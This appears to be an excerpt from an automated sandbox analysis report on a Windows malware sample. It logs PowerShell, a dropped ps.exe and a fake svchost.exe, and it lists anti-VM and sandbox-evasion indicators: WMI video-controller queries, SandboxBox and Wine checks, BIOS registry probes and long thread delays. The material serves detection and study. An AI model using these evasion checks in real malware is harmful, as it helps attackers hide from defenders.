            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM_3Show sources
            Source: Yara matchFile source: 00000020.00000002.2179906707.0000000002601000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.2157884372.0000000002671000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.2192856956.0000000002661000.00000004.00000001.sdmp, type: MEMORY
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
            Source: C:\Windows\System32\mode.comWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Local\Temp\ps.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum name: 0
            Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
            Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000 name: DriverDesc
            Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\ps.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2836Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2460Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1772Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2196Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1616Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2212Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\ps.exe TID: 2436Thread sleep time: -51103s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\ps.exe TID: 260Thread sleep time: -180000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\ps.exe TID: 260Thread sleep time: -60000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\ps.exe TID: 884Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 1976Thread sleep time: -49965s >= -30000s
            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2780Thread sleep time: -240000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2780Thread sleep time: -60000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2312Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2772Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2232Thread sleep time: -120000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2712Thread sleep time: -54723s >= -30000s
            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 3028Thread sleep time: -180000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 3028Thread sleep time: -60000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2716Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
